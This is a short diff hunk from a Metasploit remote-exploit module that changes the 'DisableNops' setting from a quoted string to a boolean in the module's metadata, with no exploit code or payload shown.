@@ -29,7 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Privileged' => false,
         'Targets' => [['Automatic', {}]],
         'DisclosureDate' => '2013-05-12',
-        'DisableNops' => 'true',
+        'DisableNops' => true,
         'DefaultTarget' => 0,
         'Notes' => {
           'Stability' => [CRASH_SAFE],
